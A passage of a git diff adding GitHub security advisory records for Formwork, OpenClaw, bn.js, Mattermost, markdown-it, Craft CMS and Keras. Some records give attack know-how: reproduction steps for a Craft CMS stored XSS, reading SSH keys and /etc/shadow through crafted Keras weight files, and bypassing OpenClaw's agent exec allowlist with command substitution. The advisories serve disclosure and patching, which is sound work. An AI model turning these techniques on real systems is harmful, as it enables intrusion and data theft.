editor role can create a new account with administrative privileges, leading to full administrative access and complete compromise of the CMS.\n\n### Impact\n\nSuccessful exploitation allows an attacker to:\n- Gain full administrative control over the CMS.\n- Access all site data and user information. \n- Modify system configuration and security settings.\n- Create, modify, or delete any user account, including legitimate administrators.\n\n### Patches\n\n[Formwork 2.3.4](https://github.com/getformwork/formwork/releases/tag/2.3.4) properly assigns roles on user creation.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "getformwork/formwork" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.0.0" + }, + { + "fixed": "2.3.4" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 2.3.3" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/getformwork/formwork/security/advisories/GHSA-34p4-7w83-35g2" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27198" + }, + { + "type": "WEB", + "url": "https://github.com/getformwork/formwork/commit/19390a0b408e084bdef86f3581e050f3ee51e7cd" + }, + { + "type": "PACKAGE", + "url": "https://github.com/getformwork/formwork" + }, + { + "type": "WEB", + "url": "https://github.com/getformwork/formwork/releases/tag/2.3.4" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-269" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-19T20:31:07Z", + "nvd_published_at": "2026-02-21T06:17:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-378v-28hj-76wf/GHSA-378v-28hj-76wf.json b/advisories/github-reviewed/2026/02/GHSA-378v-28hj-76wf/GHSA-378v-28hj-76wf.json new file mode 100644 index 0000000000000..a03ceb51fe956 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-378v-28hj-76wf/GHSA-378v-28hj-76wf.json @@ -0,0 +1,89 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-378v-28hj-76wf", + "modified": "2026-02-20T21:18:31Z", + "published": "2026-02-20T06:30:39Z", + "aliases": [ + "CVE-2026-2739" + ], + "summary": "bn.js affected by an infinite loop", + "details": "This affects versions of the package bn.js before 5.2.3. Calling maskn(0) on any BN instance corrupts the internal state, causing toString(), divmod(), and other methods to enter an infinite loop, hanging the process indefinitely.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "bn.js" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "5.2.3" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2739" + }, + { + "type": "WEB", + "url": "https://github.com/indutny/bn.js/issues/186" + }, + { + "type": "WEB", + "url": "https://github.com/indutny/bn.js/issues/316" + }, + { + "type": "WEB", + "url": "https://github.com/indutny/bn.js/pull/317" + }, + { + "type": "WEB", + "url": "https://github.com/indutny/bn.js/commit/33df26b5771e824f303a79ec6407409376baa64b" + }, + { + "type": "WEB", + "url": "https://gist.github.com/Kr0emer/02370d18328c28b5dd7f9ac880d22a91" + }, + { + "type": "PACKAGE", + "url": "https://github.com/indutny/bn.js" + }, + { + "type": "WEB", + "url": "https://github.com/indutny/bn.js/releases/tag/v5.2.3" + }, + { + "type": "WEB", + "url": "https://security.snyk.io/vuln/SNYK-JS-BNJS-15274301" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-835" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-20T21:18:31Z", + "nvd_published_at": "2026-02-20T05:17:53Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-37gc-85xm-2ww6/GHSA-37gc-85xm-2ww6.json b/advisories/github-reviewed/2026/02/GHSA-37gc-85xm-2ww6/GHSA-37gc-85xm-2ww6.json new file mode 100644 index 0000000000000..15ac4ab2878ea --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-37gc-85xm-2ww6/GHSA-37gc-85xm-2ww6.json @@ -0,0 +1,73 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-37gc-85xm-2ww6", + "modified": "2026-02-20T16:47:40Z", + "published": "2026-02-18T22:44:33Z", + "aliases": [ + "CVE-2026-27009" + ], + "summary": "OpenClaw affected by Stored XSS in Control UI via unsanitized assistant name/avatar in inline script injection", + "details": "## Summary\nStored XSS in the OpenClaw Control UI when rendering assistant identity (name/avatar) into an inline `` could break out of the script tag and execute attacker-controlled JavaScript in the Control UI origin.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.2.14`\n- Fixed in: `>= 2026.2.15` (next release; fix is already merged on `main`)\n\n## Details\nThe gateway Control UI HTML response previously injected `assistantName` and `assistantAvatar` directly into an inline `` from terminating the script element, enabling stored XSS if an operator/admin sets the assistant identity to a malicious string.\n\nOpenClaw’s Control UI is intended for local use only (see `SECURITY.md`); this advisory’s CVSS reflects a loopback-only/local-access deployment assumption.\n\n## Impact\nAn attacker with the ability to set assistant identity values (config or agent identity) could cause JavaScript execution for Control UI visitors, enabling token/session theft and privileged actions in the UI.\n\n## Fix\n- Removed inline script injection and serve bootstrap config from a JSON endpoint.\n- Added a restrictive Content Security Policy for the Control UI (`script-src 'self'`, no inline scripts).\n\n## Fix Commit(s)\n- `adc818db4a4b3b8d663e7674ef20436947514e1b`\n- `3b4096e02e7e335f99f5986ec1bd566e90b14a7e`\n\n## Release Process Note\nThis advisory pre-sets the patched version to the planned next release (`2026.2.15`). Once that version is published to npm, this advisory can be published without further edits.\n\nThanks @Adam55A-code for reporting.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2026.2.15" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-37gc-85xm-2ww6" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27009" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/3b4096e02e7e335f99f5986ec1bd566e90b14a7e" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/adc818db4a4b3b8d663e7674ef20436947514e1b" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.15" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T22:44:33Z", + "nvd_published_at": "2026-02-20T00:16:17Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-37gf-gmxv-74wv/GHSA-37gf-gmxv-74wv.json b/advisories/github-reviewed/2026/02/GHSA-37gf-gmxv-74wv/GHSA-37gf-gmxv-74wv.json index 65e255a2c2b57..3979b68093b3c 100644 --- a/advisories/github-reviewed/2026/02/GHSA-37gf-gmxv-74wv/GHSA-37gf-gmxv-74wv.json +++ b/advisories/github-reviewed/2026/02/GHSA-37gf-gmxv-74wv/GHSA-37gf-gmxv-74wv.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-37gf-gmxv-74wv", - "modified": "2026-02-10T18:35:15Z", + "modified": "2026-02-13T21:49:42Z", "published": "2026-02-09T21:31:03Z", "aliases": [ "CVE-2026-1486" @@ -25,7 +25,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "26.5.0" }, { "fixed": "26.5.3" @@ -33,6 +33,25 @@ ] } ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "org.keycloak:keycloak-services" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "26.4.9" + } + ] + } + ] } ], "references": [ @@ -52,6 +71,10 @@ "type": "WEB", "url": "https://github.com/keycloak/keycloak/commit/176dc8902ce552056d3648c4601d519afc6fb043" }, + { + "type": "WEB", + "url": "https://github.com/keycloak/keycloak/commit/8316e8538f0037d9f998181e73122cff93a94035" + }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2026:2365" diff --git a/advisories/unreviewed/2026/02/GHSA-38c4-r59v-3vqw/GHSA-38c4-r59v-3vqw.json b/advisories/github-reviewed/2026/02/GHSA-38c4-r59v-3vqw/GHSA-38c4-r59v-3vqw.json similarity index 67% rename from advisories/unreviewed/2026/02/GHSA-38c4-r59v-3vqw/GHSA-38c4-r59v-3vqw.json rename to advisories/github-reviewed/2026/02/GHSA-38c4-r59v-3vqw/GHSA-38c4-r59v-3vqw.json index 89a716520ae70..8d068ccd0ebf8 100644 --- a/advisories/unreviewed/2026/02/GHSA-38c4-r59v-3vqw/GHSA-38c4-r59v-3vqw.json +++ b/advisories/github-reviewed/2026/02/GHSA-38c4-r59v-3vqw/GHSA-38c4-r59v-3vqw.json @@ -1,11 +1,12 @@ { "schema_version": "1.4.0", "id": "GHSA-38c4-r59v-3vqw", - "modified": "2026-02-12T06:30:13Z", + "modified": "2026-02-13T20:04:39Z", "published": "2026-02-12T06:30:13Z", "aliases": [ "CVE-2026-2327" ], + "summary": "markdown-it is has a Regular Expression Denial of Service (ReDoS)", "details": "Versions of the package markdown-it from 13.0.0 and before 14.1.1 are vulnerable to Regular Expression Denial of Service (ReDoS) due to the use of the regex /\\*+$/ in the linkify function. An attacker can supply a long sequence of * characters followed by a non-matching character, which triggers excessive backtracking and may lead to a denial-of-service condition.", "severity": [ { @@ -14,10 +15,30 @@ }, { "type": "CVSS_V4", - "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "markdown-it" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "13.0.0" + }, + { + "fixed": "14.1.1" + } + ] + } + ] } ], - "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +52,13 @@ "type": "WEB", "url": "https://gist.github.com/ltduc147/c9abecae1b291ede4f692f2ab988c917" }, + { + "type": "PACKAGE", + "url": "https://github.com/markdown-it/markdown-it" + }, { "type": "WEB", - "url": "https://github.com/markdown-it/markdown-it/blob/14.1.0/lib/rules_inline/linkify.mjs%23L33" + "url": "https://github.com/markdown-it/markdown-it/blob/14.1.0/lib/rules_inline/linkify.mjs#L33" }, { "type": "WEB", @@ -45,8 +70,8 @@ "CWE-1333" ], "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, + "github_reviewed": true, + "github_reviewed_at": "2026-02-13T20:04:39Z", "nvd_published_at": "2026-02-12T06:16:02Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-3c9r-7f29-qp32/GHSA-3c9r-7f29-qp32.json b/advisories/github-reviewed/2026/02/GHSA-3c9r-7f29-qp32/GHSA-3c9r-7f29-qp32.json new file mode 100644 index 0000000000000..1bdceda443b82 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-3c9r-7f29-qp32/GHSA-3c9r-7f29-qp32.json @@ -0,0 +1,141 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3c9r-7f29-qp32", + "modified": "2026-02-19T19:34:56Z", + "published": "2026-02-16T12:30:24Z", + "aliases": [ + "CVE-2026-0999" + ], + "summary": "Mattermost fails to properly validate login method restrictions", + "details": "Mattermost versions 11.1.x <= 11.1.2, 10.11.x <= 10.11.9, 11.2.x <= 11.2.1 fail to properly validate login method restrictions which allows an authenticated user to bypass SSO-only login requirements via userID-based authentication. Mattermost Advisory ID: MMSA-2025-00548", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/mattermost/mattermost/server/v8" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "8.0.0-20251212052346-61651b0df7ea" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/mattermost/mattermost-server" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "11.1.0" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "< 11.1.3" + } + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/mattermost/mattermost-server" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "10.11.0" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "< 10.11.10" + } + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/mattermost/mattermost-server" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "11.2.0" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "< 11.2.2" + } + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/mattermost/mattermost-server" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "5.3.2-0.20251212052346-61651b0df7ea" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0999" + }, + { + "type": "WEB", + "url": "https://github.com/mattermost/mattermost/commit/61651b0df7ea5db55d1e54f8d6fb5fce4149309c" + }, + { + "type": "PACKAGE", + "url": "https://github.com/mattermost/mattermost" + }, + { + "type": "WEB", + "url": "https://mattermost.com/security-updates" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-303" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-19T19:34:56Z", + "nvd_published_at": "2026-02-16T10:16:08Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-3fqr-4cg8-h96q/GHSA-3fqr-4cg8-h96q.json b/advisories/github-reviewed/2026/02/GHSA-3fqr-4cg8-h96q/GHSA-3fqr-4cg8-h96q.json new file mode 100644 index 0000000000000..6dbb90ce41f2d --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-3fqr-4cg8-h96q/GHSA-3fqr-4cg8-h96q.json @@ -0,0 +1,88 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3fqr-4cg8-h96q", + "modified": "2026-02-20T16:46:03Z", + "published": "2026-02-18T00:53:59Z", + "aliases": [ + "CVE-2026-26317" + ], + "summary": "OpenClaw affected by cross-site request forgery (CSRF) through loopback browser mutation endpoints", + "details": "## Summary\nBrowser-facing localhost mutation routes accepted cross-origin browser requests without explicit Origin/Referer validation. Loopback binding reduces remote exposure but does not prevent browser-initiated requests from malicious origins.\n\n## Impact\nA malicious website can trigger unauthorized state changes against a victim's local OpenClaw browser control plane (for example opening tabs, starting/stopping the browser, mutating storage/cookies) if the browser control service is reachable on loopback in the victim's browser context.\n\n## Affected Packages / Versions\n- openclaw (npm): <= 2026.2.13\n- clawdbot (npm): <= 2026.1.24-3\n\n## Details\nThe browser control servers bind to loopback but exposed mutating HTTP endpoints without a CSRF-style guard. Browsers may send cross-origin requests to loopback addresses; without explicit validation, state-changing operations could be triggered from a non-loopback Origin/Referer.\n\n## Fix\nMutating HTTP methods (POST/PUT/PATCH/DELETE) are rejected when the request indicates a non-loopback Origin/Referer (or `Sec-Fetch-Site: cross-site`).\n\n## Fix Commit(s)\n- openclaw/openclaw: b566b09f81e2b704bf9398d8d97d5f7a90aa94c3\n\n## Workarounds / Mitigations\n- Enable browser control auth (token/password) and avoid running with auth disabled.\n- Upgrade to a release that includes the fix.\n\n## Credits\n- Reporter: @vincentkoc\n\n## Release Process Note\n`patched_versions` is set to the planned next release version. Once that npm release is published, the advisory should be ready to publish with no further edits.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2026.2.14" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "npm", + "name": "clawdbot" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "2026.1.24-3" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-3fqr-4cg8-h96q" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26317" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/b566b09f81e2b704bf9398d8d97d5f7a90aa94c3" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.14" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T00:53:59Z", + "nvd_published_at": "2026-02-19T22:16:47Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-3hcm-ggvf-rch5/GHSA-3hcm-ggvf-rch5.json b/advisories/github-reviewed/2026/02/GHSA-3hcm-ggvf-rch5/GHSA-3hcm-ggvf-rch5.json new file mode 100644 index 0000000000000..a4c672bb17826 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-3hcm-ggvf-rch5/GHSA-3hcm-ggvf-rch5.json @@ -0,0 +1,63 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3hcm-ggvf-rch5", + "modified": "2026-02-17T16:46:12Z", + "published": "2026-02-17T16:46:12Z", + "aliases": [], + "summary": "OpenClaw has an exec allowlist bypass via command substitution/backticks inside double quotes", + "details": "### Summary\n\nExec approvals allowlist bypass via command substitution/backticks inside double quotes.\n\n### Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected: `<= 2026.2.1`\n- Fixed: `>= 2026.2.2`\n\n### Impact\n\nOnly affects setups that explicitly enable the optional exec approvals allowlist feature. Default installs are unaffected.\n\n### Fix\n\nReject unescaped `$()` and backticks inside double quotes during allowlist analysis.\n\n### Fix Commit(s)\n\n- d1ecb46076145deb188abcba8f0699709ea17198\n\nThanks @simecek for reporting.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2026.2.2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-3hcm-ggvf-rch5" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/d1ecb46076145deb188abcba8f0699709ea17198" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.2" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-17T16:46:12Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-3jh3-prx3-w6wc/GHSA-3jh3-prx3-w6wc.json b/advisories/github-reviewed/2026/02/GHSA-3jh3-prx3-w6wc/GHSA-3jh3-prx3-w6wc.json new file mode 100644 index 0000000000000..ae3676244f566 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-3jh3-prx3-w6wc/GHSA-3jh3-prx3-w6wc.json @@ -0,0 +1,86 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3jh3-prx3-w6wc", + "modified": "2026-02-23T22:15:03Z", + "published": "2026-02-23T22:15:03Z", + "aliases": [ + "CVE-2026-27126" + ], + "summary": "Craft CMS has Stored XSS in Table Field via \"HTML\" Column Type", + "details": "A stored Cross-site Scripting (XSS) vulnerability exists in the `editableTable.twig` component when using the `html` column type. The application fails to sanitize the input, allowing an attacker to execute arbitrary JavaScript when another user views a page with the malicious table field.\n\n## Prerequisites\n* An administrator account\n* `allowAdminChanges` must be enabled in production, which is [against our security recommendations](https://craftcms.com/knowledge-base/securing-craft#set-allowAdminChanges-to-false-in-production).\n\n## Steps to Reproduce\n1. Navigate to **Settings** → **Fields** and create a new field with Type: **Table**\n1. Add a **Column Heading** and set **Column Type** to `Single-line text`\n - **Note:** The vulnerable **Column Type** is `html`, but it's not available in the UI dropdown.\n1. In **Default Values** section, add a row with the following payload:\n ```html\n \n ```\n1. Enable `Static Rows`\n1. Intercept the **Save Field** request using a proxy tool (e.g., Burp Suite) or use `cURL` directly\n1. Modify the request body and change the `types[craft-fields-Table][columns][col3][type]` parameter from `singleline` to `html`\n1. Forward the request to save the field\n1. Use the field in any object (e.g. user profile fields) → then visit the any user's profile\n1. Notice the XSS execution\n1. The XSS will also trigger when an administrator attempts to edit this field, as the malicious payload is executed within the field configuration page, too.\n\n## Resources\n\nhttps://github.com/craftcms/cms/commit/f5d488d9bb6eff7670ed2c2fe30e15692e92c52b", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "craftcms/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.5.0-RC1" + }, + { + "fixed": "4.16.19" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 4.16.18" + } + }, + { + "package": { + "ecosystem": "Packagist", + "name": "craftcms/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "5.0.0-RC1" + }, + { + "fixed": "5.8.23" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 5.8.22" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/craftcms/cms/security/advisories/GHSA-3jh3-prx3-w6wc" + }, + { + "type": "WEB", + "url": "https://github.com/craftcms/cms/commit/f5d488d9bb6eff7670ed2c2fe30e15692e92c52b" + }, + { + "type": "PACKAGE", + "url": "https://github.com/craftcms/cms" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-23T22:15:03Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-3m3q-x3gj-f79x/GHSA-3m3q-x3gj-f79x.json b/advisories/github-reviewed/2026/02/GHSA-3m3q-x3gj-f79x/GHSA-3m3q-x3gj-f79x.json new file mode 100644 index 0000000000000..733bb027dc399 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-3m3q-x3gj-f79x/GHSA-3m3q-x3gj-f79x.json @@ -0,0 +1,82 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3m3q-x3gj-f79x", + "modified": "2026-02-17T21:31:58Z", + "published": "2026-02-17T21:31:58Z", + "aliases": [], + "summary": "OpenClaw optional voice-call plugin: webhook verification may be bypassed behind certain proxy configurations", + "details": "## Affected Packages / Versions\n\nThis issue affects the optional voice-call plugin only. It is not enabled by default; it only applies to installations where the plugin is installed and enabled.\n\n- Package: `@openclaw/voice-call`\n- Vulnerable versions: `< 2026.2.3`\n- Patched versions: `>= 2026.2.3`\n\nLegacy package name (if you are still using it):\n\n- Package: `@clawdbot/voice-call`\n- Vulnerable versions: `<= 2026.1.24`\n- Patched versions: none published under this package name; migrate to `@openclaw/voice-call`\n\n## Summary\n\nIn certain reverse-proxy / forwarding setups, webhook verification can be bypassed if untrusted forwarded headers are accepted.\n\n## Impact\n\nAn external party may be able to send voice-call webhook requests that are accepted as valid, which can result in spoofed webhook events being processed.\n\n## Root Cause\n\nSome deployments implicitly trusted forwarded headers (for example `Forwarded` / `X-Forwarded-*`) when determining request properties used during webhook verification. If those headers are not overwritten by a trusted proxy, a client can supply them directly and influence verification.\n\n## Resolution\n\nIgnore forwarded headers by default unless explicitly trusted and allowlisted in configuration. Keep any loopback-only development bypass restricted to local development only. Upgrade to a patched version.\n\nIf you cannot upgrade immediately, strip `Forwarded` and `X-Forwarded-*` headers at the edge so clients cannot supply them directly.\n\n## Fix Commit(s)\n\n- `a749db9820eb6d6224032a5a34223d286d2dcc2f`\n\n## Credits\n\nThanks `@0x5t` for reporting.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "@openclaw/voice-call" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2026.2.3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "npm", + "name": "@clawdbot/voice-call" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "2026.1.24" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-3m3q-x3gj-f79x" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/a749db9820eb6d6224032a5a34223d286d2dcc2f" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.3" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-287" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-17T21:31:58Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-3m4q-jmj6-r34q/GHSA-3m4q-jmj6-r34q.json b/advisories/github-reviewed/2026/02/GHSA-3m4q-jmj6-r34q/GHSA-3m4q-jmj6-r34q.json new file mode 100644 index 0000000000000..2ffb92e093878 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-3m4q-jmj6-r34q/GHSA-3m4q-jmj6-r34q.json @@ -0,0 +1,97 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3m4q-jmj6-r34q", + "modified": "2026-02-18T22:41:58Z", + "published": "2026-02-18T22:41:58Z", + "aliases": [ + "CVE-2026-1669" + ], + "summary": "Keras has a Local File Disclosure via HDF5 External Storage During Keras Weight Loading", + "details": "## Summary\n\nTensorFlow / Keras continues to honor HDF5 “external storage” and `ExternalLink` features when loading weights. A malicious `.weights.h5` (or a `.keras` archive embedding such weights) can direct `load_weights()` to read from an arbitrary readable filesystem path. The bytes pulled from that path populate model tensors and become observable through inference or subsequent re-save operations. Keras “safe mode” only guards object deserialization and does not cover weight I/O, so this behaviour persists even with safe mode enabled. The issue is confirmed on the latest publicly released stack (`tensorflow 2.20.0`, `keras 3.11.3`, `h5py 3.15.1`, `numpy 2.3.4`).\n\n## Impact\n\n- **Class**: CWE-200 (Exposure of Sensitive Information), CWE-73 (External Control of File Name or Path)\n- **What leaks**: Contents of any readable file on the host (e.g., `/etc/hosts`, `/etc/passwd`, `/etc/hostname`).\n- **Visibility**: Secrets appear in model outputs (e.g., Dense layer bias) or get embedded into newly saved artifacts.\n- **Prerequisites**: Victim executes `model.load_weights()` or `tf.keras.models.load_model()` on an attacker-supplied HDF5 weights file or `.keras` archive.\n- **Scope**: Applies to modern Keras (3.x) and TensorFlow 2.x lines; legacy HDF5 paths remain susceptible.\n\n## Attacker Scenario\n\n1. **Initial foothold**: The attacker convinces a user (or CI automation) to consume a weight artifact—perhaps by publishing a pre-trained model, contributing to an open-source repository, or attaching weights to a bug report.\n2. **Crafted payload**: The artifact bundles innocuous model metadata but rewrites one or more datasets to use HDF5 external storage or external links pointing at sensitive files on the victim host (e.g., `/home//.ssh/id_rsa`, `/etc/shadow` if readable, configuration files containing API keys, etc.).\n3. **Execution**: The victim calls `model.load_weights()` (or `tf.keras.models.load_model()` for `.keras` archives). HDF5 follows the external references, opens the targeted host file, and streams its bytes into the model tensors.\n4. **Exfiltration vectors**:\n - Running inference on controlled inputs (e.g., zero vectors) yields outputs equal to the injected weights; the attacker or downstream consumer can read the leaked data.\n - Re-saving the model (weights or `.keras` archive) persists the secret into a new artifact, which may later be shared publicly or uploaded to a model registry.\n - If the victim pushes the re-saved artifact to source control or a package repository, the attacker 